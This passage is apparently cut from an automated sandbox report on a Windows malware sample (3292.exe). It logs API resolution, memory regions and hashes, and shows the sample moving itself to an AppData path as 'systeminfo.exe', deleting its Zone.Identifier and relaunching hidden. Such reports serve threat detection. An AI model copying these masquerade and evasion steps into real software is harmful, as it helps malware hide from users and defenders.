Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x75a05a4b	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x75a1eceb	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x75a011c0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x75a014e9	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7729e026	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x75a014c9	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x75a011a9	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75a01809	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x75a011f8	1	Fn
Module	Load	module_name = USER32.dll, base_address = 0x75790000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x757bae5f	1	Fn
Module	Load	module_name = ADVAPI32.dll, base_address = 0x756e0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameA, address_out = 0x7570a4b4	1	Fn
System	Get Computer Name	result_out = YKYD69Q	1	Fn
System	Get Computer Name	result_out = YKyd69q, type = ComputerNameDnsHostname	1	Fn

Process #5: 3292.exe

(Host: 86, Network: 0)

Information	Value
ID	#5
File Name	c:\users\public\3292.exe
Command Line	"C:\Users\Public\3292.exe"
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:00:31, Reason: Child Process
Unmonitor	End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration	00:01:52

OS Process Information

Information	Value
PID	0xb44
Parent PID	0xb2c (c:\users\public\3292.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Groups	YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B48 0x B50 0x B54 0x BF0 0x BF4 0x BF8

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	Readable, Writable	Region Actions Download Dump
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000060000	0x00060000	0x00061fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00070000	0x000d6fff	Memory Mapped File	Readable	Region Actions
private_0x00000000000e0000	0x000e0000	0x000f1fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000100000	0x00100000	0x0010dfff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000110000	0x00110000	0x0011dfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000120000	0x00120000	0x0012ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000130000	0x00130000	0x0013ffff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
pagefile_0x0000000000140000	0x00140000	0x00140fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000150000	0x00150000	0x0018ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000190000	0x00190000	0x0019ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000001a0000	0x001a0000	0x001a1fff	Pagefile Backed Memory	Readable	Region Actions
windowsshell.manifest	0x001b0000	0x001b0fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000001b0000	0x001b0000	0x001b0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000001c0000	0x001c0000	0x001c1fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000001d0000	0x001d0000	0x001d6fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000001e0000	0x001e0000	0x0021ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000220000	0x00220000	0x00221fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000230000	0x00230000	0x0026ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000270000	0x00270000	0x00270fff	Pagefile Backed Memory	Readable	Region Actions
cversions.1.db	0x00280000	0x00283fff	Memory Mapped File	Readable	Region Actions
cversions.2.db	0x00280000	0x00283fff	Memory Mapped File	Readable	Region Actions
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000013.db	0x00290000	0x002b4fff	Memory Mapped File	Readable	Region Actions
private_0x00000000002c0000	0x002c0000	0x003bffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000003c0000	0x003c0000	0x00547fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000550000	0x00550000	0x005cffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000005d0000	0x005d0000	0x00750fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000760000	0x00760000	0x0085ffff	Private Memory	Readable, Writable	Region Actions Download Dump
sortdefault.nls	0x00860000	0x00b2efff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000000b30000	0x00b30000	0x00b30fff	Pagefile Backed Memory	Readable, Writable	Region Actions
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db	0x00b40000	0x00b6ffff	Memory Mapped File	Readable	Region Actions
cversions.2.db	0x00b70000	0x00b73fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000000b80000	0x00b80000	0x00b80fff	Pagefile Backed Memory	Readable, Writable	Region Actions
3292.exe	0x00be0000	0x00bfefff	Memory Mapped File	Readable, Writable, Executable	Region Actions Download Dump
pagefile_0x0000000000c00000	0x00c00000	0x01ffffff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000002000000	0x02000000	0x021fffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000002000000	0x02000000	0x020defff	Pagefile Backed Memory	Readable	Region Actions
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db	0x020e0000	0x02145fff	Memory Mapped File	Readable	Region Actions
private_0x0000000002160000	0x02160000	0x0219ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000021c0000	0x021c0000	0x021fffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002200000	0x02200000	0x025d0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002200000	0x02200000	0x022fffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002370000	0x02370000	0x023affff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000023e0000	0x023e0000	0x0241ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002440000	0x02440000	0x0253ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000025e0000	0x025e0000	0x026dffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000027d0000	0x027d0000	0x028cffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000028d0000	0x028d0000	0x029d0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002a10000	0x02a10000	0x02b0ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002ca0000	0x02ca0000	0x02d9ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000002da0000	0x02da0000	0x03192fff	Pagefile Backed Memory	Readable	Region Actions
comctl32.dll	0x74150000	0x742edfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
propsys.dll	0x74530000	0x74624fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x74650000	0x746cffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x746e0000	0x746e7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x746f0000	0x7474bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x74750000	0x7478efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winspool.drv	0x74800000	0x74850fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winmm.dll	0x74860000	0x74891fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msacm32.dll	0x748a0000	0x748b3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x74b40000	0x74b55fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntmarta.dll	0x74b60000	0x74b80fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wtsapi32.dll	0x74b90000	0x74b9cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
profapi.dll	0x74ba0000	0x74baafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
userenv.dll	0x74bb0000	0x74bc6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x74dc0000	0x74dcbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x74dd0000	0x74e2ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x74e30000	0x74e8ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x74e90000	0x74ea8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iertutil.dll	0x74ec0000	0x750bafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msasn1.dll	0x750c0000	0x750cbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x750d0000	0x75126fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x75130000	0x751bffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75250000	0x75295fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x752a0000	0x7534bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wininet.dll	0x75350000	0x75444fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x75450000	0x755abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x755b0000	0x7564cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x75650000	0x756d2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x756e0000	0x7577ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x75780000	0x75789fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75790000	0x7588ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
crypt32.dll	0x758d0000	0x759ecfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x759f0000	0x75afffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x75b00000	0x75bcbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x75c50000	0x76899fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cfgmgr32.dll	0x768a0000	0x768c6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
setupapi.dll	0x76900000	0x76a9cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wldap32.dll	0x76b10000	0x76b54fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x76b60000	0x76beefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
devobj.dll	0x76c20000	0x76c31fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
urlmon.dll	0x76c40000	0x76d75fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x76d80000	0x76e6ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000076e70000	0x76e70000	0x76f69fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000076f70000	0x76f70000	0x7708efff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
ntdll.dll	0x77090000	0x77238fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77270000	0x773effff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000007efa7000	0x7efa7000	0x7efa9fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efaa000	0x7efaa000	0x7efacfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efad000	0x7efad000	0x7efaffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efd5000	0x7efd5000	0x7efd7fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions Download Dump
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions

Created Files

Filename	File Size	Hash Values	YARA Match	Actions
c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe	120.00 KB (122880 bytes)	MD5: ca6f2ee0e3b7218da76d126d22f707be SHA1: a7fc89d6b45ce712c0be6600be4a8e6de9de434d SHA256: b4e2b553642c3772769b83c5be8623f22f90323e626d9c8945585368445af8a4		File Actions Show Properties Download

Threads

Thread 0xb48

(Host: 74, Network: 0)

Category	Operation	Information	Count	Logfile
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:18:14 (Local Time)	1	Fn
System	Get Time	type = Ticks, time = 95815	1	Fn
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:18:14 (Local Time)	1	Fn
System	Get Time	type = Ticks, time = 95815	1	Fn
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:18:14 (Local Time)	1	Fn
System	Get Time	type = Ticks, time = 95815	1	Fn
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:18:14 (Local Time)	1	Fn
System	Get Time	type = Ticks, time = 95815	1	Fn
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:18:14 (Local Time)	1	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:18:14 (Local Time)	1	Fn
Module	Get Address	function = VirtualAlloc, ordinal = 0, address_out = 0x3bfa94	1	Fn
Module	Get Address	function = VirtualAlloc, ordinal = 0, address_out = 0x3bfacc	1	Fn
Module	Get Address	function = LoadLibraryA, ordinal = 0, address_out = 0x3bfb3c	1	Fn
Module	Get Address	function = UnmapViewOfFile, ordinal = 0, address_out = 0x3bfb3c	1	Fn
Module	Get Address	function = GetProcAddress, ordinal = 0, address_out = 0x3bfb3c	1	Fn
Module	Get Address	function = VirtualAlloc, ordinal = 0, address_out = 0x3bfb3c	1	Fn
Module	Get Address	function = VirtualProtect, ordinal = 0, address_out = 0x3bfb3c	1	Fn
Module	Get Address	function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x3bfb3c	1	Fn
Module	Get Address	function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x3bfb3c	1	Fn
Module	Load	module_name = msvcrt.dll, base_address = 0x752a0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\msvcrt.dll, function = strchr, address_out = 0x752adbeb	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\msvcrt.dll, function = free, address_out = 0x752a9894	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\msvcrt.dll, function = malloc, address_out = 0x752a9cee	1	Fn
Module	Load	module_name = KERNEL32.dll, base_address = 0x759f0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FreeConsole, address_out = 0x75aa6aa8	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x75a01700	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x75a2828e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x75a04435	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x75a05929	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x75a23102	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x75a054ee	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x75a04442	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x75a01245	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x75a014b1	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameA, address_out = 0x75a1b6e0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameExA, address_out = 0x75a842ef	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x75a05a4b	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x75a1eceb	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x75a011c0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x75a014e9	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7729e026	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x75a014c9	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x75a011a9	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75a01809	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x75a011f8	1	Fn
Module	Load	module_name = USER32.dll, base_address = 0x75790000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x757bae5f	1	Fn
Module	Load	module_name = ADVAPI32.dll, base_address = 0x756e0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameA, address_out = 0x7570a4b4	1	Fn
System	Get Computer Name	result_out = YKYD69Q	1	Fn
System	Get Computer Name	result_out = YKyd69q, type = ComputerNameDnsHostname	1	Fn
Module	Load	module_name = advapi32.dll, base_address = 0x756e0000	1	Fn
Module	Load	module_name = ole32.dll, base_address = 0x75450000	1	Fn
Module	Load	module_name = shell32.dll, base_address = 0x75c50000	1	Fn
Module	Load	module_name = crypt32.dll, base_address = 0x758d0000	1	Fn
Module	Load	module_name = urlmon.dll, base_address = 0x76c40000	1	Fn
Module	Load	module_name = userenv.dll, base_address = 0x74bb0000	1	Fn
Module	Load	module_name = wininet.dll, base_address = 0x75350000	1	Fn
Module	Load	module_name = wtsapi32.dll, base_address = 0x74b90000	1	Fn
System	Get Info	type = Windows Directory, result_out = C:\Windows	1	Fn
Module	Get Filename	process_name = c:\users\public\3292.exe, file_name_orig = C:\Users\Public\3292.exe, size = 260	1	Fn
Service	Open Manager	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Module	Unmap	process_name = c:\users\public\3292.exe	1	Fn
System	Get Computer Name	result_out = YKYD69Q	1	Fn
Mutex	Release	-	1	Fn
System	Get Time	type = Ticks, time = 97282	1	Fn

Thread 0xbf0

(Host: 1, Network: 0)

Category	Operation	Information	Success	Count	Logfile
System	Get Time	type = Ticks, time = 102289		1	Fn

Thread 0xbf4

(Host: 11, Network: 0)

Category	Operation	Information	Count	Logfile
System	Get Time	type = Ticks, time = 103288	1	Fn
File	Get Info	filename = C:\, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\, type = file_attributes	1	Fn
File	Move	source_filename = C:\Users\Public\3292.exe, destination_filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe	1	Fn
File	Delete	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe:Zone.Identifier	1	Fn
Process	Create	process_name = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, os_pid = 0xbfc, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE	1	Fn

Process #6: systeminfo.exe

(Host: 59, Network: 0)

Information	Value
ID	#6
File Name	c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe
Command Line	"C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe"
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:00:39, Reason: Child Process
Unmonitor	End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration	00:01:44

OS Process Information

Information	Value
PID	0xbfc
Parent PID	0xb44 (c:\users\public\3292.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Groups	YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 740

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	Readable, Writable	Region Actions Download Dump
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000060000	0x00060000	0x00061fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00070000	0x000d6fff	Memory Mapped File	Readable	Region Actions
private_0x00000000000e0000	0x000e0000	0x000f1fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000100000	0x00100000	0x0010dfff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000110000	0x00110000	0x0011dfff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000120000	0x00120000	0x0012ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000130000	0x00130000	0x0013ffff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000000170000	0x00170000	0x001affff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000001b0000	0x001b0000	0x002bffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000002e0000	0x002e0000	0x003dffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000003e0000	0x003e0000	0x004befff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000560000	0x00560000	0x005dffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000005e0000	0x005e0000	0x006dffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000760000	0x00760000	0x0085ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000860000	0x00860000	0x009e7fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000009f0000	0x009f0000	0x00b70fff	Pagefile Backed Memory	Readable	Region Actions
3292.exe	0x00be0000	0x00bfefff	Memory Mapped File	Readable, Writable, Executable	Region Actions Download Dump
pagefile_0x0000000000c00000	0x00c00000	0x01ffffff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000021b0000	0x021b0000	0x021bffff	Private Memory	Readable, Writable	Region Actions Download Dump
sortdefault.nls	0x021c0000	0x0248efff	Memory Mapped File	Readable	Region Actions
private_0x0000000002490000	0x02490000	0x02860fff	Private Memory	Readable, Writable	Region Actions Download Dump
uxtheme.dll	0x74650000	0x746cffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x746e0000	0x746e7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x746f0000	0x7474bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x74750000	0x7478efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winspool.drv	0x74800000	0x74850fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winmm.dll	0x74860000	0x74891fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msacm32.dll	0x748a0000	0x748b3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x74dc0000	0x74dcbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x74dd0000	0x74e2ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x74e30000	0x74e8ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
